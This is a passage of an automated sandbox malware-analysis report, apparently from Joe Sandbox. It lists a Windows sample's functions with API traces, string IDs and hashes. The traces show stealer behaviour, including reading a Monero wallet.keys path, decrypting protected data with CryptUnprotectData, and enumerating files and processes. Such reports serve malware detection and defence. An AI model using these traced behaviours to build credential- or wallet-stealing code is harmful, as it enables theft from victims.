                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00647C62
                    • LocalFree.KERNEL32(00000000), ref: 00647D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: 52e677dec0942ff00b33d799cf648fe161413f24ea9b4356baa50397b49897f2
                    • Instruction ID: c6fac26da4827f325565db59b41f13778d7bb644987ee34c2717251307e94d86
                    • Opcode Fuzzy Hash: 52e677dec0942ff00b33d799cf648fe161413f24ea9b4356baa50397b49897f2
                    • Instruction Fuzzy Hash: 24416B71940218AFDB64DB94DC89BEEB37AFF44700F204199E40962281DB346F85CFA5
                    Function 0063E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00650D73), ref: 0063E4A2
                    • StrCmpCA.SHLWAPI(?,006514F8), ref: 0063E4F2
                    • StrCmpCA.SHLWAPI(?,006514FC), ref: 0063E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: 462a78a8aac7789b37e5cddb55c36cb7af2e1c5f2b033d6de6e9962c5a3fbf4e
                    • Instruction ID: d434bf8d5feeba569d66d28cd5fc26331f2af0354aac6ad883c4a3c406f18254
                    • Opcode Fuzzy Hash: 462a78a8aac7789b37e5cddb55c36cb7af2e1c5f2b033d6de6e9962c5a3fbf4e
                    • Instruction Fuzzy Hash: 47126671950118BBEB58FBA0DC96EED733AAF54300F41459CB50A56091EF30AF49CFA6
                    Function 00A06A7F Relevance: 9.1, Strings: 6, Instructions: 1644COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &66$1*u=$:M'$^Z}u$c&;{$}nw
                    • API String ID: 0-175420206
                    • Opcode ID: 18ca08cfb5a006d9e968fb08847b848939d075774de9970ca3ff16378cd28469
                    • Instruction ID: a1a63f26c158804065d63292a8a7b301f83e3555cb9832fba8b15ca1a2805110
                    • Opcode Fuzzy Hash: 18ca08cfb5a006d9e968fb08847b848939d075774de9970ca3ff16378cd28469
                    • Instruction Fuzzy Hash: 77B217F3A0C2049FE304AE2DEC8577ABBE9EF94320F16493DE6C5C7744EA3558058696
                    Function 00639AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00634EEE,00000000,?), ref: 00639B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639B2A
                    • LocalFree.KERNEL32(?,?,?,?,00634EEE,00000000,?), ref: 00639B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: Nc
                    • API String ID: 4291131564-1584449269
                    • Opcode ID: ba69f8a60e6cace0ceacd91667e9918e0f5f0dd38a4bfb01ededb5fa382b524b
                    • Instruction ID: 3157fdd68158a3d448c90e6b245e0e94d905042ff28b3c48d42719e1ef038e43
                    • Opcode Fuzzy Hash: ba69f8a60e6cace0ceacd91667e9918e0f5f0dd38a4bfb01ededb5fa382b524b
                    • Instruction Fuzzy Hash: 9311A4B4240208EFEB14CF64DC95FAAB7B5FB89700F208058F9199B394C7B5A941CF91
                    Function 00A033E8 Relevance: 7.9, Strings: 5, Instructions: 1645COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &~s_$Lr;$Qpxo$j<?$9}>
                    • API String ID: 0-1819094296
                    • Opcode ID: 327861af2dc46d414808862f827a86bc41520d6ff083247159adb71312c3fe81
                    • Instruction ID: d46c7d38ce323c8bbda585d040dc995abd49e2d0882b62995a4c16c837ba1374
                    • Opcode Fuzzy Hash: 327861af2dc46d414808862f827a86bc41520d6ff083247159adb71312c3fe81
                    • Instruction Fuzzy Hash: DAB2F6F3A082009FE704AE2DDC8567AB7E5EFD4720F1A893DE6C5C3744EA3598058697
                    Function 00A085CE Relevance: 7.9, Strings: 5, Instructions: 1611COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #G~m$&+u$0o[w$oaCY$n}o
                    • API String ID: 0-1092153006
                    • Opcode ID: 87405ff7ee1de03c1a11d19841fc24594f0c063eb76f6ce73e2877baf768d745
                    • Instruction ID: c8d423d7c3461b74e2b5861214120b5d5e9528b4fd3b8ecb31636335b90bfe70
                    • Opcode Fuzzy Hash: 87405ff7ee1de03c1a11d19841fc24594f0c063eb76f6ce73e2877baf768d745
                    • Instruction Fuzzy Hash: E7B207F3A0C210AFE7046E29EC8577ABBE9EF94720F16493DE6C5C3744EA3558018697
                    Function 0063C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0063C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0063C87C
                    • lstrcat.KERNEL32(?,00650B46), ref: 0063C943
                    • lstrcat.KERNEL32(?,00650B47), ref: 0063C957
                    • lstrcat.KERNEL32(?,00650B4E), ref: 0063C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 700cb4026d0701a141e2d8bf551608c971b26161a31d5a780e9f8c2cc947c812
                    • Instruction ID: 8afab21226455b1e694f91a4c2deae27406b1f8da7adb26340c4ea3921316d9d
                    • Opcode Fuzzy Hash: 700cb4026d0701a141e2d8bf551608c971b26161a31d5a780e9f8c2cc947c812
                    • Instruction Fuzzy Hash: 0E4182B4904219DFDB14DF90DD89BFEB7B9BB88304F1041A8F509A62C0D7709A84CF92
                    Function 00646920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 0064696C
                    • sscanf.NTDLL ref: 00646999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006469B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006469C0
                    • ExitProcess.KERNEL32 ref: 006469DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: de94cf19006c772814c6fed2210ccda0f2a68becb0d71e9d868948d45d5d66b2
                    • Instruction ID: 557bf820ad14af61b14b0bac5951980b0b781175f48fa09a49cb79d8232a4e9c
                    • Opcode Fuzzy Hash: de94cf19006c772814c6fed2210ccda0f2a68becb0d71e9d868948d45d5d66b2
                    • Instruction Fuzzy Hash: 6121ED75D14209ABCF08EFE4D9499EEB7B6FF48300F04452EE41AE3254EB349645CB6A
                    Function 00637240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0063724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00637254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00637281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006372A4
                    • LocalFree.KERNEL32(?), ref: 006372AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: 49c61c94cd79aa7e41bb06e2ae0b366a12b621e7c76261fe4ba40ef715ba5ccb
                    • Instruction ID: 66b6d5e323524a4f93c7cd0e88a4c918bc56f89f6c35ba07b4de1a125839f571
                    • Opcode Fuzzy Hash: 49c61c94cd79aa7e41bb06e2ae0b366a12b621e7c76261fe4ba40ef715ba5ccb
                    • Instruction Fuzzy Hash: C80100B5A40208BBEB14DFD4CD4AF9E7779FB44701F104154FB09AA2C4D670EA418BA6
                    Function 00649600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0064961E
                    • Process32First.KERNEL32(00650ACA,00000128), ref: 00649632
                    • Process32Next.KERNEL32(00650ACA,00000128), ref: 00649647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0064965C
                    • CloseHandle.KERNEL32(00650ACA), ref: 0064967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: e07aa44e97b800944ed40e60ee71ec6d9eedf04b42c65a34f141a294026bd841
                    • Instruction ID: 4df541b73a15f37f1f3779838a16eb0789957be3c16de2d9801ea45409201875
                    • Opcode Fuzzy Hash: e07aa44e97b800944ed40e60ee71ec6d9eedf04b42c65a34f141a294026bd841
                    • Instruction Fuzzy Hash: 3E011E75A40208EBDB18DFA5CD48BEEB7F9FB48741F104198A909A7240D734DB80DF61
                    Function 009FFD8E Relevance: 6.6, Strings: 4, Instructions: 1642COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /~/$[-c$_-wS$m$n]
                    • API String ID: 0-1439815905
                    • Opcode ID: aa97af20099f9e7096e208a29a4f8070b02da814db4469751557e12b14fb2dd9
